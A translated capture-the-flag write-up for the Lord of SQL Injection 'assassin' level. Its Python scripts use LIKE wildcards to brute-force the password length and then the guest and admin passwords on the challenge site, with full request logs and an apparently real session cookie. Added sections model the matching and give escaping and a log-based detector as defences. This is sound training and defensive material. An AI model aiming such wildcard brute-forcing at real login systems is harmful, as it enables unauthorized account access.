Problem solving / Lord of SQL Injection

[Lord Of SQL Injection] No. 15

Kwon Oh! JUN 2022. 2. 5. 02:58

query : select id from prob_assassin where pw like ''



<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // only the single quote is filtered; LIKE metacharacters pass through untouched
  if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_assassin where pw like '{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
  if($result['id'] == 'admin') solve("assassin");
  highlight_file(__FILE__);
?>


Since the query uses LIKE, I first assumed this was an equals-sign bypass problem and tried a number of things, but that did not seem to be it. After looking it up, I found that the wildcard concept could be applied here.

 

https://www.w3schools.com/sql/sql_wildcards.asp

 


Symbol | Description | Example
% | Represents zero or more characters | bl% finds bl, black, blue, and blob
_ | Represents a single character | h_t finds hot, hat, and hit
[] | Represents any single character within the brackets | h[oa]t finds hot and hat, but not hit
^ | Represents any character not in the brackets | h[^oa]t finds hit, but not hot and hat
- | Represents any single character within the specified range | c[a-b]t finds cat and cbt

 

LIKE Operator | Description
WHERE CustomerName LIKE 'a%' | Finds any values that start with "a"
WHERE CustomerName LIKE '%a' | Finds any values that end with "a"
WHERE CustomerName LIKE '%or%' | Finds any values that have "or" in any position
WHERE CustomerName LIKE '_r%' | Finds any values that have "r" in the second position
WHERE CustomerName LIKE 'a__%' | Finds any values that start with "a" and are at least 3 characters in length
WHERE ContactName LIKE 'a%o' | Finds any values that start with "a" and end with "o"

 

Example:

DB name: information_DB

id | pw
admin | bird1234
guest | dog5678

● select id from information_DB where pw like '________'

☞ admin

* Eight underscores, so the pw with exactly 8 characters is admin's, and admin is printed.

 

● select id from information_DB where pw like '%d'

☞ guest

 

● select id from information_DB where pw like '%dog'

☞ guest

 

● select id from information_DB where pw like '%34'

☞ admin

 


Finding the password length

import requests

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="쿠키값")   # "쿠키값" is a placeholder for your own PHPSESSID
word = '_'
underline = '_'
i = 0
count = 0

# Send 1, 2, 3, ... underscores: the first pattern that matches a row
# has exactly as many '_' as the password has characters.
while i < 100:
    param = "?pw="+word
    res_url = url + param
    word+=underline
    count+=1
    print(param)
    print(str(count)+"개\n")
    response = requests.get(res_url, cookies=cookie)
    if response.text.find("Hello guest") > 0:
        break
    i+=1   # advance the loop counter inside the loop
print("password 길이: "+str(count)+"자리")

?pw=_
1개

?pw=__
2개

?pw=___
3개

?pw=____
4개

?pw=_____
5개

?pw=______
6개

?pw=_______
7개

?pw=________
8개

password 길이: 8자리

 

Finding the password

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="쿠키값")   # "쿠키값" is a placeholder for your own PHPSESSID
asc = string.digits+string.ascii_letters
word = ''

# One position at a time: try every candidate character as the next prefix
# character with a trailing '%', and keep the one whose response names admin.
for count in range(1,9):
    for i in asc:
        param = "?pw="+word+i+"%"
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        print(res_url)

        if response.text.find("Hello admin") > 0:
            word+=i
            print(word)
            break
print("패스워드: "+word)

☞ Nothing was captured, so I tried changing the check to guest.

 

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="qhqu5hair6nce0o06k79m6mni7")
asc = string.digits+string.ascii_letters
word = ''

# Same prefix search as above, but keyed on the guest greeting instead.
for count in range(1,9):
    for i in asc:
        param = "?pw="+word+i+"%"
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        print(res_url)

        if response.text.find("Hello guest") > 0:
            word+=i
            print(word)
            break

print("패스워드: "+word)

https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=9%
9
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90%
90
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=900%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=901%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=902%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=903%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=904%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=905%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=906%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=907%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=908%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=909%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90a%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90b%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90c%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d%
90d
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2%
90d2
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d20%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d21%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d22%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d23%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d24%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d25%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d26%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d27%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d28%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d29%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2a%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2b%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2c%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2d%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2e%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f%
90d2f
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f9%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fa%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fb%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fc%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fd%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe%
90d2fe
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe1%
90d2fe1
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe10%
90d2fe10
패스워드: 90d2fe10

☞ The guest password is captured.

 

id | pw
guest | 90d2fe10
admin | ?

* At this point admin's password is not captured, while guest's password 90d2fe10 is.

My inference was that guest's password partly overlaps with admin's, so that when the wildcard approach is used the result is read as guest. So this time I wrote the code so that it appends a '_' when the response says guest, and records the character when the response says admin, so that admin's password can be parsed.
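To make the wildcard semantics from the table above and the masking effect just described concrete, here is an added Python model (my example, not part of the original post or of the challenge's own code). It implements LIKE's `%` and `_` (the only two of the tabled wildcards that MySQL, which the challenge's mysqli code runs on, supports) over a constructed two-row table that returns guest before admin, as the challenge does, and pairs it with a LIKE-escaping routine of the kind a defender applies to untrusted input before it reaches a LIKE clause. The row contents and the function names are assumptions.

```python
import re

# Constructed rows in the order the challenge's table returns them
# (guest before admin); the passwords are the ones recovered in this
# write-up. Not real data from the challenge database.
ROWS = [
    {"id": "guest", "pw": "90d2fe10"},
    {"id": "admin", "pw": "902efd10"},
]


def like_to_regex(pattern, escape="\\"):
    """Translate a SQL LIKE pattern into an anchored regex.

    '%' matches any run of characters (including none), '_' exactly one
    character, and anything preceded by the escape character is literal.
    MySQL's default collation is case-insensitive, so IGNORECASE is set.
    """
    out = []
    i = 0
    while i < len(pattern):
        c = pattern[i]
        if c == escape and i + 1 < len(pattern):
            out.append(re.escape(pattern[i + 1]))   # escaped metacharacter
            i += 2
            continue
        if c == "%":
            out.append(".*")
        elif c == "_":
            out.append(".")
        else:
            out.append(re.escape(c))
        i += 1
    return re.compile("^" + "".join(out) + "$", re.IGNORECASE | re.DOTALL)


def sql_like(value, pattern):
    """True when `value LIKE pattern` would hold."""
    return like_to_regex(pattern).match(value) is not None


def first_id_matching(pattern, rows=ROWS):
    """Model `select id from prob_assassin where pw like '<pattern>'`
    followed by mysqli_fetch_array(): only the FIRST matching row is
    returned, so a pattern that fits both users always answers 'guest'."""
    for row in rows:
        if sql_like(row["pw"], pattern):
            return row["id"]
    return None


def escape_like(user_input, escape="\\"):
    """Defensive counterpart: escape LIKE metacharacters in untrusted input
    so the value can only match itself literally. The backslash is MySQL's
    default LIKE escape character."""
    return (
        user_input.replace(escape, escape + escape)
        .replace("%", escape + "%")
        .replace("_", escape + "_")
    )


if __name__ == "__main__":
    for probe in ["________", "9%", "902%", "__2%", "%"]:
        print(f"pw like '{probe}'  ->  {first_id_matching(probe)}")
    for probe in ["9%", "90d2fe10"]:
        safe = escape_like(probe)
        print(f"pw like '{safe}' (escaped)  ->  {first_id_matching(safe)}")
```

Running it shows why the second script above found nothing: every prefix shared by both passwords (such as `9%`) answers guest, because guest's row comes first and mysqli_fetch_array() returns one row; admin only surfaces once the prefix diverges (`902%`, `__2%`). With the input passed through escape_like(), `9%` no longer matches anything, and only the exact password matches its own row. In the PHP above the equivalent fix is to bind `pw` as a parameter and compare with `=` rather than interpolating it into a LIKE pattern.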

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="쿠키값")   # "쿠키값" is a placeholder for your own PHPSESSID
asc = string.digits+string.ascii_letters
word = ''

# Prefix search keyed on both greetings: an admin response fixes the
# character, a guest response means this position is shared with guest,
# so it is recorded as a '_' wildcard and the search moves on.
for count in range(1,9):
    for i in asc:
        param = "?pw="+word+i+"%"
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        print(res_url)

        if response.text.find("Hello admin") > 0:
            word+=i
            print(word)
            break

        elif response.text.find("Hello guest") > 0:
            word+="_"
            print(word)
            break

print("패스워드: "+word)

https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=9%
_
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=_0%
__
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2%
__2
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__20%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__21%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__22%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__23%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__24%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__25%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__26%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__27%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__28%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__29%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2a%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2b%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2c%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2d%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e%
__2e
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e9%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ea%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2eb%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ec%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ed%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ee%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef%
__2ef
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef9%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efa%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efb%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efc%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd%
__2efd
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd1%
__2efd1
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd10%
__2efd10
패스워드: __2efd10

id | pw
guest | 90d2fe10
admin | 902efd10

* The part of admin's password overlapping with guest's was 90_______.
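Seen from the server side, the probing in this write-up leaves an easily recognisable trail: a single client sending a run of `pw` values that end in `_` or `%` against the same script, growing one character at a time. The detector below is an added example of mine, not part of the post; the access-log lines are constructed to mirror the requests the scripts above send (some with the trailing `%` sent raw, as requests does, some percent-encoded as `%25`), and the parameter name, the threshold and the log format (Apache combined) are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log, not a real server log. The first six
# lines mimic the length probe and the prefix search from this write-up;
# the last two are benign traffic from a different client.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Feb/2022:02:40:01 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=_ HTTP/1.1" 200 1311
10.0.0.5 - - [05/Feb/2022:02:40:02 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__ HTTP/1.1" 200 1311
10.0.0.5 - - [05/Feb/2022:02:40:02 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=___ HTTP/1.1" 200 1311
10.0.0.5 - - [05/Feb/2022:02:40:03 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=0%25 HTTP/1.1" 200 1288
10.0.0.5 - - [05/Feb/2022:02:40:03 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=9% HTTP/1.1" 200 1311
10.0.0.5 - - [05/Feb/2022:02:40:04 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90% HTTP/1.1" 200 1311
10.0.0.9 - - [05/Feb/2022:02:41:10 +0900] "GET /chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=hunter2 HTTP/1.1" 200 1288
10.0.0.9 - - [05/Feb/2022:02:41:15 +0900] "GET /index.php HTTP/1.1" 200 5120
"""

# Apache combined format: client, identd, user, [timestamp], "request", status, size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# A value that ends in a LIKE metacharacter is exactly what prefix-by-prefix
# probing produces ('_', '__', ..., '9%', '90%', ...). A legitimate password
# can end that way too, which is why alerts are count-based, not per request.
PROBE_RE = re.compile(r"^[A-Za-z0-9_]*[%_]$")


def parse_line(line):
    """Return client, path, timestamp and decoded query parameters for one
    log line, or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs decodes %25 to '%' and leaves a dangling raw '%' untouched,
    # so both encodings of the probe end up as the same value.
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "path": parts.path, "params": params}


def is_like_probe(value):
    return PROBE_RE.match(value) is not None


def detect_like_probing(log_text, param="pw", threshold=3):
    """Group requests by (client, path) and report every client that sent
    at least `threshold` wildcard-terminated values for `param`."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for value in rec["params"].get(param, []):
            if is_like_probe(value):
                probes[(rec["ip"], rec["path"])].append(value)
    alerts = []
    for (ip, path), values in sorted(probes.items()):
        if len(values) >= threshold:
            alerts.append({"ip": ip, "path": path,
                           "count": len(values), "samples": values[:3]})
    return alerts


if __name__ == "__main__":
    for a in detect_like_probing(SAMPLE_LOG):
        print(f"{a['ip']} sent {a['count']} LIKE probes to {a['path']}, "
              f"e.g. {a['samples']}")
```

The detector only tells you that someone is walking the password with wildcards; it does not stop them. The fix belongs in the query: bind `pw` as a parameter and compare with `=`, or, where LIKE is genuinely needed, escape `%` and `_` in the user-supplied value before it is interpolated.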